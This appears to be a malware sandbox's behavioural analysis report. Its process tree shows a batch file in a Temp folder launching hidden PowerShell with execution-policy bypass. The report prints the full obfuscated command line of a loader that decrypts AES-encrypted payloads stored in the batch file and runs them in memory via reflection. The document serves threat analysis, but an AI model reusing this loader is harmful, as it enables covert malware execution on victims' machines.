
Behavioral Analysis

Process tree

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "gGYcLv" C:\Users\test22\AppData\Local\Temp\Dtaqbmza.bat

    2588
    • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Dtaqbmza.bat

      2660
      • powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command $kdot_tzwRsZUJVbQSvaAdQzSTmKovkQyvFKghyTtlfWyr = 'C:\Users\test22\AppData\Local\Temp\Dtaqbmza.bat'; $PvdIqjptkwzRWjPApNtECTNUfvNJCZDVulwVksGO=[System.Security.Cryptography.Aes]::Create(); $PvdIqjptkwzRWjPApNtECTNUfvNJCZDVulwVksGO.IV=[System.Convert]::FromBase64String('7AM2yoZ/54dcP3vKSzsqGA=='); $PvdIqjptkwzRWjPApNtECTNUfvNJCZDVulwVksGO.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $PvdIqjptkwzRWjPApNtECTNUfvNJCZDVulwVksGO.Key=[System.Convert]::FromBase64String('QWVElovYpX3jzYwnlNT8Uf/i1KixgzGrFxLrNjNQkUY='); $PvdIqjptkwzRWjPApNtECTNUfvNJCZDVulwVksGO.Mode=[System.Security.Cryptography.CipherMode]::CBC;function decrypt_function($param_var){ $tLtYuglriQrHRuaVIjCUvFQkSExLNTpXhEkQzPzY=$PvdIqjptkwzRWjPApNtECTNUfvNJCZDVulwVksGO.CreateDecryptor(); $kwBLIWdZkAnbPLsOUifQJAEpBtAmkjvSJDKZefCW=$tLtYuglriQrHRuaVIjCUvFQkSExLNTpXhEkQzPzY.TransformFinalBlock($param_var, 0, $param_var.Length); $kwBLIWdZkAnbPLsOUifQJAEpBtAmkjvSJDKZefCW;}function execute_function($param_var,$param2_var){ $UrBOqNGxlRQhCPuWAZwTvDzVkryTmjAebiEZIMYH=[System.Reflection.Assembly]::Load([byte[]]$param_var); $cKWcvbfZZlsJXzXrSGDZoMlbrMgulvnNaORKGxAi=$UrBOqNGxlRQhCPuWAZwTvDzVkryTmjAebiEZIMYH.EntryPoint; $cKWcvbfZZlsJXzXrSGDZoMlbrMgulvnNaORKGxAi.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = $kdot_tzwRsZUJVbQSvaAdQzSTmKovkQyvFKghyTtlfWyr;$eIGbxVhLRvHrvQziUVefWfBmlmESLUyXmRvFkMug = [type]::GetType('Syst'+'e'+'m'+'.I'+'O.F'+'i'+'l'+'e');$OpKrnIxiOdDoHSGZgtPlroaWXJfEuUYiAXqHvkZD = [type]::GetType('S'+'ys'+'t'+'e'+'m'+'.E'+'nv'+'i'+'ro'+'n'+'me'+'n'+'t');$myUaQQgClnhcjZtqzUKJVKOEYEJjImKufuMPRkkA = $eIGbxVhLRvHrvQziUVefWfBmlmESLUyXmRvFkMug::ReadAllText($kdot_tzwRsZUJVbQSvaAdQzSTmKovkQyvFKghyTtlfWyr);$FEjXnkEavAlLMQmBKpcmhXTZCMWOmDypKkdrBQqN = $OpKrnIxiOdDoHSGZgtPlroaWXJfEuUYiAXqHvkZD::NewLine;$ZINhbYHoilfChYtHKkvAnQNScVbCNVZTYomyjMXD = 
$myUaQQgClnhcjZtqzUKJVKOEYEJjImKufuMPRkkA.Split($FEjXnkEavAlLMQmBKpcmhXTZCMWOmDypKkdrBQqN);$mWcxKgzgwUMPNqYIkaHBAyekUJtBGoXTbAGqIRLd = $ZINhbYHoilfChYtHKkvAnQNScVbCNVZTYomyjMXD;foreach ($pmGVnSEeJSyQoLrtSROfDgynLHRLMHoyGZKArEUe in $mWcxKgzgwUMPNqYIkaHBAyekUJtBGoXTbAGqIRLd) { if ($pmGVnSEeJSyQoLrtSROfDgynLHRLMHoyGZKArEUe.StartsWith(':: ')) { $rsZKYruhVLafpWQNRSCaMXzhWSNnJIatoDkiztmD=$pmGVnSEeJSyQoLrtSROfDgynLHRLMHoyGZKArEUe.Substring(3); break; }}$payloads_var=[string[]]$rsZKYruhVLafpWQNRSCaMXzhWSNnJIatoDkiztmD.Split('\');$payload1_var= decrypt_function ([Convert]::FromBase64String($payloads_var[0]));$payload2_var= decrypt_function ([Convert]::FromBase64String($payloads_var[1]));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

        2748
